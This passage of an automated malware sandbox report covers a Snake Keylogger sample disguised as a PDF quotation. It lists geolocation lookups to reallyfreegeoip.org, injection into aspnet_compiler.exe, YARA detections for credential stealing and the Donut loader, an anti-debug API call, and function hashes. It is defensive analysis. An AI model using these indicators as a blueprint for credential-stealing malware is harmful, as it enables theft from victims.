cfL4;desc="?proto=TCP&rtt=1993&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1392465&cwnd=32&unsent_bytes=0&cid=3ce54ad844a3078e&ts=464&x=0"
2024-11-21 12:09:12 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49855	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:15 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 12:09:15 UTC	847	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:15 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154864 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1m0cvrc5Lm4jPCPKyzz3M4Y3gvK%2B3Y6ZlaZhBbrWZNabThmHhxPH6g2bGVHInkHnNNVipKR3jhp8NoS5fUAiEHo3lVbhh4sFW9tBCWTrLfGFIVz1UytsJBqWmLt3q4u4O65GfPz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6091dfab415e86-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1546&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1772920&cwnd=238&unsent_bytes=0&cid=80348239ba836f0b&ts=454&x=0"
2024-11-21 12:09:15 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49862	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:18 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 12:09:18 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:18 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154867 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CepEUcjjuj%2F6ppuzMoche6HCDWnIzQgbZHjKD1A5Os8ZXc1g2MbtsANu%2Fvt4WbvDJSr%2Be6nl3xS%2FMQ63m00r4YXAFBifAzvE%2FsyJ9SsZQ2qlyioIxhEl7p70hgnCqcVCATPYs98L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6091f29dd78c57-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2123&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1548250&cwnd=208&unsent_bytes=0&cid=9677d569fd0eaf17&ts=480&x=0"
2024-11-21 12:09:18 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49872	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:21 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 12:09:21 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:21 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154870 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aVt6CDXXIvx0jk66ELW%2Fu8NBbLVMHa895fQ5470pK1tcsYnygds9N9V%2FBAzR9kEy2SQ8TKtp00jKrlOXcebotLckflnM8yGh0T7vTZ7hQV0Gn4BIdbluRwYRY%2FgA8Yf%2F%2B%2BY5Bt92"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6092057970426b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1768625&cwnd=232&unsent_bytes=0&cid=e5f65f994faf4d0d&ts=468&x=0"
2024-11-21 12:09:21 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Target ID:	0
Start time:	07:07:57
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe"
Imagebase:	0x1195ccb0000
File size:	413'696 bytes
MD5 hash:	C62FB9BD9189ED019DB81D5CEC1EE11B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2653712164.00000119775B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:08:55
Start date:	21/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x1f59dca0000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3319881103.000001F59FBCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:08:55
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF8491403D3 Relevance: 4.6, Strings: 2, Instructions: 2065COMMON

Download Yara Rule

Strings

C,_I, xrefs: 00007FF849140404
',_H, xrefs: 00007FF8491414C4

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: ',_H$C,_I
API String ID: 0-641918142
Opcode ID: ce775b52fc9262a67bbd9586927693ab2a09b3091bf2d787a88cda5eecd4994b
Instruction ID: 92927e674c8293a8af01c8dd73558f1b85153ba1955864de273f4367a372861d
Opcode Fuzzy Hash: ce775b52fc9262a67bbd9586927693ab2a09b3091bf2d787a88cda5eecd4994b
Instruction Fuzzy Hash: 5EE2C770A1CA49CFDB98EF28C484BA977F1FF59340F1441A9D44DDB296CA39E885CB41

Function 00007FF8491619F5 Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF849161AA3

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: afc77d2cc1421025c8950d8002562a00ff64ae7da42eefd620493f6e17f711ae
Instruction ID: f157c5da2edbc52400fdc92c43aef586bdee83ffe38eccac45af3b5efd2baf4d
Opcode Fuzzy Hash: afc77d2cc1421025c8950d8002562a00ff64ae7da42eefd620493f6e17f711ae
Instruction Fuzzy Hash: 1731E57180C7588FDB29DF58984A6F97BE1FF95311F04462FD08AD3182DB7868458B91

Function 00007FF84915539D Relevance: 1.2, Instructions: 1242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d55c199f2d8a021d4d5c6749fb2477143bdae92bd1af121a35fe77ca61e42e
Instruction ID: d8e8a4c821ef6379186f4bf8d40321d0f126d9f73ed6324f95e18256a69cf429
Opcode Fuzzy Hash: 89d55c199f2d8a021d4d5c6749fb2477143bdae92bd1af121a35fe77ca61e42e
Instruction Fuzzy Hash: 09820730A1CB8A4FE769AF2884542B5B7E1FF543A0F55457ED04BC76D6DE3CA8428B40

Function 00007FF849148029 Relevance: .9, Instructions: 897
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23ab6c20bb2a027d478d6abf75b296dc18322d0bae0896856833762eed25f27
Instruction ID: dcb79a877952e764922bc83c6fbdd0fa7ef05f86d11f93308d79f548adcec66d
Opcode Fuzzy Hash: e23ab6c20bb2a027d478d6abf75b296dc18322d0bae0896856833762eed25f27
Instruction Fuzzy Hash: 6A52A331A1CA8A8FE7A8EF288455675B7E1FF58350F5406BDC44EC7686DF38B8418B81

Function 00007FF849145041 Relevance: .9, Instructions: 895COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a08721177566573398f28e6cd00c8642faefdca1a107ebf43f41e6d5a9789c5
Instruction ID: df8b5dbf6f6b0181ca8f84ede79f133dca619a75f88187d96414a6c706636a41
Opcode Fuzzy Hash: 5a08721177566573398f28e6cd00c8642faefdca1a107ebf43f41e6d5a9789c5
Instruction Fuzzy Hash: 70427030B1C9498FDB98EB2CD458B7977E1EF59351F1501BAE44EC72A2DE28EC428B41

Function 00007FF849141DE1 Relevance: .8, Instructions: 796COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98cf229fb64fd6fd7d58a27effc0a2fbbddbdca304876d90b2917adbfa423f3e
Instruction ID: 98620661fd331cce28ba122aa1c13380c5e8d41ad6a142c5e70cf4e64232997b
Opcode Fuzzy Hash: 98cf229fb64fd6fd7d58a27effc0a2fbbddbdca304876d90b2917adbfa423f3e
Instruction Fuzzy Hash: C742C130A1CB898FE769EF28C445575B7E1FF99350F1409BDD48AC7296DA38E882CB41

Function 00007FF849147B40 Relevance: .8, Instructions: 760COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce463bb0ea76742e56eb428043e91a283d84f7a692cf3be627d0fcb25b381d12
Instruction ID: 799ae3f109b200b93fa46011e5c8017736c653c27faad976880756e3738f783b
Opcode Fuzzy Hash: ce463bb0ea76742e56eb428043e91a283d84f7a692cf3be627d0fcb25b381d12
Instruction Fuzzy Hash: 20321930A1DA868FE769EF28848567577D1FF99780F1405BDD48EC7296DE2CBC028B81

Function 00007FF849165B66 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d0fec75d08b56e54cdb095288d25ac9680444b5fe584c5c04dffb4b7f32c14
Instruction ID: f81a550918372ec3db86288956264210e94f10cfcf9d79436cbb96c61f10fdaf
Opcode Fuzzy Hash: 41d0fec75d08b56e54cdb095288d25ac9680444b5fe584c5c04dffb4b7f32c14
Instruction Fuzzy Hash: 44F1A63090CA8D8FEBA9EF28C8557E977E1FF54350F04426AD84EC7295DB389945CB81

Function 00007FF849166912 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2c705561d10e97e5b469097eaaa893b1aef5000e66ce18e6f4bbba1280e1f1
Instruction ID: 8feff6e2e91eb5b9622df7f413a64e141add0d60dddfe4baa14262849dca7ef5
Opcode Fuzzy Hash: 1b2c705561d10e97e5b469097eaaa893b1aef5000e66ce18e6f4bbba1280e1f1
Instruction Fuzzy Hash: B5E1B43090CA8E8FEBA9EF28C8557E977D1FB54350F04826ED84DC7291DE78A8458B81

Function 00007FF848F40328 Relevance: 3.2, Strings: 2, Instructions: 655
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Jp], xrefs: 00007FF848F40414
L_^, xrefs: 00007FF848F406C2

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: Jp]$L_^
API String ID: 0-1167134851
Opcode ID: b3f821751130049b693d356dc84e520f19dd817e93da7c69b731e2bcee1deb0a
Instruction ID: e90cdc5404ada9ae406b358761127d5232b0efbd607e69c3a3bb38b45ee049be
Opcode Fuzzy Hash: b3f821751130049b693d356dc84e520f19dd817e93da7c69b731e2bcee1deb0a
Instruction Fuzzy Hash: 6E22B672D1EAC25FF395B77828151B57FE0FFB2A90F1840BBC4889B0D7DA185806875A

Function 00007FF849093ABD Relevance: 1.8, Strings: 1, Instructions: 534
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6_H, xrefs: 00007FF849093FEF

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: 6_H
API String ID: 0-1318916205
Opcode ID: 2658b7cc6a262212a5cc741250b9d2d2c3c64c7d68dd719dcdd0f2bac99468bb
Instruction ID: 028d91c03e13fd817371703e00a82180f78a2d93543d658de88d85cdfc4cbffe
Opcode Fuzzy Hash: 2658b7cc6a262212a5cc741250b9d2d2c3c64c7d68dd719dcdd0f2bac99468bb
Instruction Fuzzy Hash: 6C12D730D0D65ECFEBA4EF6884556BDB7B1FF59345F5001BAD00EA2291CB78A885CB40

Function 00007FF849093759 Relevance: 1.6, Strings: 1, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6_H, xrefs: 00007FF849093971

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: 6_H
API String ID: 0-1318916205
Opcode ID: 11010d613666c86fe7114e2d6507a3f71c89b73334a718602a738ff130947fdf
Instruction ID: e14c1be07d2dd1a48f28a85f334b0506a4773bc344d14650e2baf731ba8dd30a
Opcode Fuzzy Hash: 11010d613666c86fe7114e2d6507a3f71c89b73334a718602a738ff130947fdf
Instruction Fuzzy Hash: 56C14C31D0CA9A8FEBA5EF68C4556B97BF1FF59354F10017AD009E31A2CB38A885CB50

Function 00007FF848F409A5 Relevance: 1.6, Strings: 1, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HbH, xrefs: 00007FF848F40C10

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: HbH
API String ID: 0-3628727451
Opcode ID: fec87c37ae61cdb54a322d2d7bd777217a2a979add725e9759767856f1ea200e
Instruction ID: 727a0bf11ad546e21124879630f36a0a535ac4f6b5d5b0750a9e5f91a131f12d
Opcode Fuzzy Hash: fec87c37ae61cdb54a322d2d7bd777217a2a979add725e9759767856f1ea200e
Instruction Fuzzy Hash: FD91153190CA8A4FE795FF2488152A97BE1FFA5754F0401BBD849D71D3DB38A8068B45

Function 00007FF848F408B5 Relevance: 1.3, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_H, xrefs: 00007FF848F408DF

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: _H
API String ID: 0-1700728219
Opcode ID: cdf1bb6bb146ebf634a683c5b3152a5f948e83fec4189e0e35d48c0c6aa0fa8b
Instruction ID: 2423fae897679b292e6c8639e20ee07a3acea9f83ce70f60322c98dcbe010d8e
Opcode Fuzzy Hash: cdf1bb6bb146ebf634a683c5b3152a5f948e83fec4189e0e35d48c0c6aa0fa8b
Instruction Fuzzy Hash: 4C317170A08A4DCFDB84EF6CC4846ADBBF1FF98310F1046AAD049D72A2D7349985CB41

Function 00007FF84909307C Relevance: .6, Instructions: 599COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27eb1259e706f37b108c181db5e8c25af21f4eb0aa26973c2e6eb874c1f5ab29
Instruction ID: 5f901e274fbd462ad0482726d2caf7f6f5b17eda7c507126acb992faa1c99eb3
Opcode Fuzzy Hash: 27eb1259e706f37b108c181db5e8c25af21f4eb0aa26973c2e6eb874c1f5ab29
Instruction Fuzzy Hash: 9E125970E0C95E9FEFA4EF5898457B977A1FF68794F1001B5D00DE32A5DB38A9818B80

Function 00007FF848F4BBF3 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

